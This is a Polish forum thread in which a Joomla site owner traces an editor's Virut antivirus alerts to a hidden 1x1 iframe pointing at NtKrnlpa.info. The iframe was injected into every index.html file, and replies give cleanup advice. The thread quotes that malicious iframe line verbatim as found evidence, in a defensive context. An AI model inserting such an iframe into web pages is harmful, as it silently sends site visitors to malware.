Witajcie. Jeden z redaktorów na mojej stronie skarży się że nie może dodawać newsów. Mówi że antywirus wykrywa wirusa w ....uploadzie, co dla mnie jest dość dziwne. Chodzi o upload grafiki w edytorze. Sprawdziłem pliki i nie widzę żadnych zmian. O dziwo u innych redaktorów wszystko działa bez problemu. Ale postanowiłem zrobić osobny upload dla tego redaktora. Zrobiłem najprostszy upload w php. Okazało się że znowu coś jest nie tak i znowu antywirus blokuje stronę. Powiedziałem mu żeby wyłączył antywira. Wyłączył i ............ żaden z tych uploaderów nie chce wejść (Strona przekroczyła limit czasu połączenia). Powiedzcie mi czy to jest w ogóle możliwe żeby coś było nie tak? Skoro nawet osobny uploader nie związany w żaden sposób z Joomla nie działa temu użytkownikowi?
Z góry dzięki za odpowiedź.

Odpowiedź może być tylko jedno - niech ten Twój redaktor kupi Kasperskiego i przeskanuje swój komputer, bo na darmowym antywirusie typu Avast cuda się zdarzają. Nie 'widzi' tego, co widzieć powinien, a wyrzuca komunikaty z Marsa.

Poprosiłem go o dokładny opis sytuacji wraz ze zrzutami ekranu. Okazało się że ten mój upload w php działa. Ale nie działa już samo umieszczenie grafiki w edytorze. Ani w tym zwykłym "insert image" ani w "grafika". Mianowicie nie otwierają się nowe okienka i połączenie zostaje zresetowane. Antywirus wyrzuca taki błąd:
Zagrożenie: Win32/Virut.NAT wirus.
Program to: Eset smart security
Wie ktoś ocb?

Spakuj stronę, ściągnij ją do siebie i przeskanuj. Jeśli jest wirus, to może uda się wyleczyć pliki. Jeśli nie uda się wyleczyć, to masz problem. Wirus może tez siedzieć w bazie. Wówczas pomoże przywrócenie z kopii, o ile ją masz. Bardzo ważna jest data infekcji.

Heh i znalazłem dziada. W plikach index.html w com_media nie zgadzały mi się rozmiary z oryginalnymi. Otwieram a w środku:

<iframe src="http://NtKrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>


Nadpisałem pliki i myślę że będzie ok. Muszę sprawdzić większość plików czy się zgadzają. O dziwo patrząc na daty zmiany plików to wszystkie się zgadzały z czasem kiedy ja je wgrywałem, więc nie wiem jak ten kod się tam znalazł.

I niestety stało się to czego się obawiałem. Złośliwy kod jest w każdym pliku index.html w katalogu strony. Pytanie tylko jak się tego masowo pozbyć. Bo jednak tych plików trochę jest :/ Ogólnie znalazłem informację o tym kodzie. Kieruje on na stronę z Trojanem. Ehh

Masowo... nadpisz Joomla wersją instalacyjną i sprawdź uprawnienia katalogów (chmody), czy aby nie są za wysokie (777), bo w ten sposób otwierasz bramę hakerom. Przy nadpisywaniu pomiń katalog installation.

Edit: Total Commandera też wyrzuć na śmietnik (historii).